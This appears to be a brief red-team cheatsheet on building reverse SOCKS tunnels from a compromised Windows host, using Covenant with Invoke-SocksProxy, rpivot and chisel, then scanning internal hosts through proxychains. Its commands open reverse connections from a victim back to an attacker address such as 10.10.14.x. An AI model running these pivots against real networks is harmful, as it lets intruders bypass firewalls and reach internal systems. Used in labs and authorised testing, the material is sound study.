<![CDATA[
# Covenant Reverse Socks Proxy
Cobalt strike has this neat feature where you can start a socks proxy on a beacon to tunnel traffic with proxychains.
You can do something similiar with some powershell and covenant. https://github.com/p3nt4/Invoke-SocksProxy
import the invoke-socksproxy.psm1
```
powershellimport
```
create an ssl cert
```
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout private.key -out cert.pem
openssl x509 -in cert.pem -noout -sha1 -fingerprint | cut -d "=" -f 2 | tr -d ":"
```
setup a handler
```
python ReverseSocksProxyHandler.py 443 1080 ./cert.pem ./private.key
```
setup a connection
```
powershell Invoke-ReverseSocksProxy -remotePort 443 -remoteHost 10.10.14.x
```
use proxychains
```
proxychains nmap -sT -Pn 10.10.x.x
```
All in all a pretty neat way to do a poor mans tunnel
These two other projects that have served me well too:
https://github.com/klsecservices/rpivot
```
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
python client.py --server-ip <ip> --server-port 9999
```
https://github.com/jpillora/chisel
```
./chisel server -p 8080 --reverse
chisel-x64.exe client 10.10.14.x:8080 R:1081:socks
```
use socks5 not socks4
https://medium.com/@vegardw/reverse-socks-proxy-using-chisel-the-easy-way-48a78df92f29
https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
]]>